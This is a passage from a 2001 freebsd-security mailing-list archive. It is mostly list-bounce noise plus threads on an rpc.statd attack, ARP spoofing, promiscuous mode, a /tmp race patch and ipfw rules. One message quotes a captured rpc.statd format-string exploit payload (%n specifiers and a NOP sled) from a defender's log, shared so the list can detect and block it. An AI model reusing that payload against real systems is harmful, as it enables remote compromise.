with SMTP id 8C83737B422 for ; Fri, 20 Apr 2001 14:23:48 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 16:25:51 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mail.integratus.com ([63.209.2.83]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:51 -0500 Received: (qmail 18228 invoked from network); 20 Apr 2001 21:23:41 -0000 Received: from kungfu.integratus.com (HELO integratus.com) (172.20.5.168) by tortuga1.integratus.com with SMTP; 20 Apr 2001 21:23:41 -0000 Sender: jar Message-ID: <3AE0A8DD.EF998C51@integratus.com> Date: Fri, 20 Apr 2001 14:23:41 -0700 From: Jack Rusher Organization: http://www.integratus.com/ X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: fwd-newswire-request Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit subject: # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mail.integratus.com ([63.209.2.83]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:51 -0500 Received: (qmail 18228 invoked from network); 20 Apr 2001 21:23:41 -0000 Received: from kungfu.integratus.com (HELO integratus.com) (172.20.5.168) by tortuga1.integratus.com with SMTP; 20 Apr 2001 21:23:41 -0000 Sender: jar Message-ID: <3AE0A8DD.EF998C51@integratus.com> Date: Fri, 20 Apr 2001 14:23:41 -0700 From: Jack Rusher Organization: http://www.integratus.com/ X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: leave-fwd-newswire-2059532E@nova.sparklist.com Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Jack Rusher, Senior Engineer | mailto:jar@integratus.com Integratus, Inc. | http://www.integratus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:31:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id 4596937B43C for ; Fri, 20 Apr 2001 14:31:10 -0700 (PDT) (envelope-from scheidell@fdma.com) Received: from MIKELT (mikelt.fdma.lan [192.168.3.5]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f3KLUpg57538 for ; Fri, 20 Apr 2001 17:30:52 -0400 (EDT) Message-ID: <004e01c0c9e1$2cb1d390$0503a8c0@fdma.com> From: "Michael Scheidell" To: References: Subject: Re: rpc.statd attack Date: Fri, 20 Apr 2001 17:30:50 -0400 Organization: Florida Datamation, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Pär Thoren" wrote in message news:Pine.GSO.4.21.0104202315040.27489-100000@helios... > > Ok when I get portscanned...but these guys tries to exploit my ass. set up ipfw for next round. I suspect that there is a 'probe' for port 111, every day this happens 3 or 4 times a day on every system I monitor. If you want to log them, and automatically have them reported, see www.mynetwatchman.com there is a perl agent available that will autoupload deny's from ipfw logs (cisco logs, sonicwall logs, and bonus: versio.bind queries are logges at pudp port 53 attacks for you as well) The freebsd files are not in a ports package (yet) but if somone wants to do it, I have the perl scripts and rc.d/sh startup file available. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:37:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mooseriver.com (erie.mooseriver.com [205.166.121.26]) by hub.freebsd.org (Postfix) with ESMTP id 03E9C37B424 for ; Fri, 20 Apr 2001 14:37:42 -0700 (PDT) (envelope-from jgrosch@mooseriver.com) Received: (from jgrosch@localhost) by mooseriver.com (8.11.2/8.11.2) id f3KLbZS79931; Fri, 20 Apr 2001 14:37:35 -0700 (PDT) (envelope-from jgrosch) Date: Fri, 20 Apr 2001 14:37:35 -0700 From: Josef Grosch To: =?iso-8859-1?Q?P=E4r_Thoren?= Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd attack Message-ID: <20010420143734.A79887@mooseriver.com> Reply-To: jgrosch@mooseriver.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0.1i In-Reply-To: ; from t98pth@student.bth.se on Fri, Apr 20, 2001 at 11:17:55PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 20, 2001 at 11:17:55PM +0200, Pär Thoren wrote: > > Ok when I get portscanned...but these guys tries to exploit my ass. > > Apr 20 23:09:05 z rpc.statd: invalid hostname to > sm_stat: ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P > > I guess it´s the old linux rpc.statd epxloit. But how can I see what IP > did this? Does rpc.statd log this information by default? > > /Pär Ya, I saw a couple of these in my log files last night. I also would like to find out what the IP of these bozos is. I'd like to let their ISP know that these guys need to be spank pretty hard. One should check to see if rpc.statd is turned off in /etc/inetd.conf. Josef -- Josef Grosch | Another day closer to a | FreeBSD 4.3 jgrosch@MooseRiver.com | Micro$oft free world | www.bafug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 15:11:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 38B6537B43F for ; Fri, 20 Apr 2001 15:11:28 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:13:31 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:13:31 -0500 From: freebsd-security@freebsd.org (freebsd-security) To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:13:31 -0500 From: freebsd-security@freebsd.org (freebsd-security) To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:131.225.121.207 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 15:13:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 50F0337B42C for ; Fri, 20 Apr 2001 15:13:08 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:15:11 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:15:11 -0500 From: freebsd-security@freebsd.org (Freebsd Security) To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:15:11 -0500 From: freebsd-security@freebsd.org (Freebsd Security) To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:216.78.192.125 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 15:51:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 5583037B43C for ; Fri, 20 Apr 2001 15:51:41 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:53:43 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:53:43 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KMtpI10729 for ; Fri, 20 Apr 2001 17:55:51 -0500 Message-Id: <4.3.1.2.20010420174802.02e4a2f0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:48:06 -0500 To: fwd-newswire-request From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:53:43 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KMtpI10729 for ; Fri, 20 Apr 2001 17:55:51 -0500 Message-Id: <4.3.1.2.20010420174802.02e4a2f0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:48:06 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 16: 1:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 1491337B43C for ; Fri, 20 Apr 2001 16:01:54 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 18:03:36 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 18:03:36 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KN5jI12517 for ; Fri, 20 Apr 2001 18:05:45 -0500 Message-Id: <4.3.1.2.20010420175757.00d1f610@207.67.22.123> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:58:01 -0500 To: fwd-newswire-request From: "SparkLIST.com Abuse" Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 18:03:36 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KN5jI12517 for ; Fri, 20 Apr 2001 18:05:45 -0500 Message-Id: <4.3.1.2.20010420175757.00d1f610@207.67.22.123> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:58:01 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: "SparkLIST.com Abuse" Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 19: 2: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ct980320-b.blmngtn1.in.home.com (ct980320-b.blmngtn1.in.home.com [65.8.207.32]) by hub.freebsd.org (Postfix) with ESMTP id 8BCF837B423 for ; Fri, 20 Apr 2001 19:02:03 -0700 (PDT) (envelope-from mikes@ct980320-b.blmngtn1.in.home.com) Received: (from mikes@localhost) by ct980320-b.blmngtn1.in.home.com (8.11.3/8.11.3) id f3L21xf14241; Fri, 20 Apr 2001 21:01:59 -0500 (EST) (envelope-from mikes) From: Mike Squires Message-Id: <200104210201.f3L21xf14241@ct980320-b.blmngtn1.in.home.com> Subject: Re: rpc.statd attack In-Reply-To: <20010420143734.A79887@mooseriver.com> "from Josef Grosch at Apr 20, 2001 02:37:35 pm" To: jgrosch@mooseriver.com Date: Fri, 20 Apr 2001 21:01:59 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I saw a couple of these in my log files last night. I also would like to > find out what the IP of these bozos is. I'd like to let their ISP know that > these guys need to be spank pretty hard. I get them all the time; I assume they are varients of the Ramen attack. I use snort 1.7 to track the alleged incoming IP numbers; a few ISP's have reported back to me that in fact they found hacked LINUX boxes at the indicated address. (snort 1.7 from ports, plus snortsnarf from www.snort.org to put the logs into a quickly readable format). MLS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 0:13:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 1E37737B422 for ; Sat, 21 Apr 2001 00:13:16 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from skinflutei32jg (windows.box [64.3.150.191]) by bluenugget.net (Postfix) with ESMTP id 504B213602 for ; Sat, 21 Apr 2001 00:16:12 -0700 (PDT) Message-ID: <000701c0ca33$5d05fbf0$bf960340@skinflutei32jg> From: "Jason DiCioccio" To: Subject: Fw: Linux patches to solve /tmp race problem Date: Sat, 21 Apr 2001 00:19:11 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This looks pretty neat.. kind of strange, but neat none the less :-).. Any comments on whether it should go to the wishlist or straight to the trash? :) (I think it would be a nice sysctl tweak myself) > From: matthew@DATADELIVERANCE.COM > Hi all, > > I have recently developed some patches to the Linux 2.2 kernels which solve > the /tmp race problem without needing to define environment variables - > useful particularly for naive applications and scripts which dont use > TMPDIR and friends. > > The patch creates "dynamic" symlinks, which point to different paths > depending on the user accessing them (for example, including the UID in the > path name). Such a link can be placed instead of /tmp and/or /var/tmp, and > any other similar directories. More usefully, these links can be configured > to automatically create the directory they refer to if it does not exist. > > This means you can create a directory such as /tmp_files, for example, and > have the /tmp link automatically create user directories in it on demand. > Default permissions and ownership can be specified. > > The patches are available from http://www.datadeliverance.com in the Linux > Patches section, along with a full discussion of the issues involved. Your > comments on the scheme are invited. > > Cheers > > -Matthew > > -- > +--------------------------------------------------------------------------+ > | Matthew Donaldson http://www.datadeliverance.com | > | Data Deliverance Pty. Ltd. Email: matthew@datadeliverance.com | > | 30 Musgrave Ave. Phone: +61 8 8265 7976 _ | > | Banksia Park Fax: +61 8 8265 0032 John / \/ | > | South Australia 5091 3:16 \_/\ | > +--------------------------------------------------------------------------+ > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 1:53:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 9BBAF37B422 for ; Sat, 21 Apr 2001 01:53:21 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id QAA16889 for ; Sat, 21 Apr 2001 16:55:50 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Sat, 21 Apr 2001 16:56:20 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Reply-To: Igor Podlesny Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <1972094846.20010421165620@morning.ru> To: freebsd-security@FreeBSD.ORG Subject: Re[2]: static arp values X-Sender: Igor Podlesny MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org PT> On Fri, 20 Apr 2001, Joseph Gleason wrote: >> When you do arp -a, is the static entry you set marked as permanent? PT> yes it is >> >> Did you simulate anouther box taking that IP and look at the arp table >> afterward? >> PT> Yes I did. And the arp is infact what it is suppose to be. So it appear PT> static. (when i did the same thing on w2k, arp -s, the mac adress PT> changed). PT> But I can still sniff the connection between the machine with the static PT> arp value and the router. That is what I find strange. hm. it seems you need to know how ETHERNET networks work. No matter does a box know MAC.addr of other box or it asks network for it. At last, they will talk to each other over SHARED media which ETHERNET certainly is. You may use `Switches' to avoid such situation, some of them can be even configured to bind their ports to respective MAC addrs, but some cards can be MAC changeable, as "Joseph Gleason" mentioned before... In short, all these gotchas are drawbacks of Ethernet technology. If you use it the only way to be 99% protected is using of VPN technology over it. good luck! PT> I simulate the man-in-the-middle attack with ettercap by the way. >> Also, you should be aware that some cards allow you to change the MAC >> address of the card. (At least I think so...never tried it) So an evil >> machine could steal the MAC address and fool the switch into sending it your >> traffic. >> >> Depending on how advanced your switch is and if it is managable, you can >> hardcode what MAC address is on what port...avoid this one as well. >> >> ----- Original Message ----- >> From: "Pär Thoren" >> To: >> Sent: Friday, April 20, 2001 13:13 >> Subject: static arp values >> >> >> > Hi! >> > >> > >> > Is it possible to make a arptable entry static? For example the arp adress >> > of my gateway. So that man-in-the-middle attack can be prevented. >> > >> > >> > I´ve tried "arp -S ip-adres mac-adres" but it seems that it is still >> > possible to infect the arptable with a false mac adress of the gateway and >> > sniff the connection. >> > >> > >> > /Pär >> > >> > >> > >> > To Unsubscribe: send mail to majordomo@FreeBSD.org >> > with "unsubscribe freebsd-security" in the body of the message >> > >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> PT> To Unsubscribe: send mail to majordomo@FreeBSD.org PT> with "unsubscribe freebsd-security" in the body of the message -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 3:29: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id F326237B422 for ; Sat, 21 Apr 2001 03:28:58 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Sat, 21 Apr 2001 05:30:59 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from R181204.resnet.ucsb.edu ([128.111.181.204]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 05:30:59 -0500 Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f3LAa3j40155 for ; Sat, 21 Apr 2001 03:36:03 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Sat, 21 Apr 2001 03:36:03 -0700 (PDT) From: mudman To: fwd-newswire-request Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII subject: # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from R181204.resnet.ucsb.edu ([128.111.181.204]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 05:30:59 -0500 Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f3LAa3j40155 for ; Sat, 21 Apr 2001 03:36:03 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Sat, 21 Apr 2001 03:36:03 -0700 (PDT) From: mudman To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 6:15:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id AFCF837B422 for ; Sat, 21 Apr 2001 06:15:37 -0700 (PDT) (envelope-from razor@ldc.ro) Received: (qmail 56377 invoked by uid 666); 21 Apr 2001 13:15:31 -0000 Date: Sat, 21 Apr 2001 16:05:33 +0300 From: Alex Popa To: Chris Faulhaber Subject: Re: more on promiscuity Message-ID: <20010421160533.A56321@ldc.ro> References: <20010419095536.B81766@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010419095536.B81766@peitho.fxp.org>; from jedgar@fxp.org on Thu, Apr 19, 2001 at 09:55:37AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 09:55:37AM -0400, Chris Faulhaber wrote: > On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > > Ntop, I assume, will enable ? > > How do I disable once it is enabled ? > > > > It will be disabled when the program terminates (you should have > both enabled and disabled entries in your logs) When using user ppp, and tcpdump on my tun0 interface, the interface gets into promiscuous mode, but not out of promisc mode. (I am bit unsure, but I think it stays promisc even after quitting ppp, not that it would be a problem I think) > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org ------------+------------------------------------------ Alex Popa, | "Artificial Intelligence is razor@ldc.ro| no match for Natural Stupidity" ------------+------------------------------------------ "It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 8:51:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 6F97137B422 for ; Sat, 21 Apr 2001 08:51:50 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA31941 for ; Sat, 21 Apr 2001 18:06:36 +0100 Message-Id: <200104211706.SAA31941@mailgate.kechara.net> Date: Sat, 21 Apr 2001 16:54:35 +0100 To: freebsd-security@freebsd.org From: Lee Smallbone Subject: ipfw problem Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi there, The machine stops booting on either of these two rules, and I have to boot into single user, remove the rules and reboot. What's wrong with them? ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} I also get the same problem on this rule (in place of the one above): ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} Any ideas? TIA. -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 8:55:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 0EAB237B422 for ; Sat, 21 Apr 2001 08:55:48 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 17570 invoked by uid 1000); 21 Apr 2001 15:54:10 -0000 Date: Sat, 21 Apr 2001 18:54:10 +0300 From: Peter Pentchev To: Lee Smallbone Cc: freebsd-security@freebsd.org Subject: Re: ipfw problem Message-ID: <20010421185410.C458@ringworld.oblivion.bg> Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org References: <200104211706.SAA31941@mailgate.kechara.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104211706.SAA31941@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 04:54:35PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote: > Hi there, > > The machine stops booting on either of these two rules, and I have to boot into > single user, remove the rules and reboot. What's wrong with them? > > ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} > > I also get the same problem on this rule (in place of the one above): > > ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} Where exactly in the boot process does it 'stop'? What 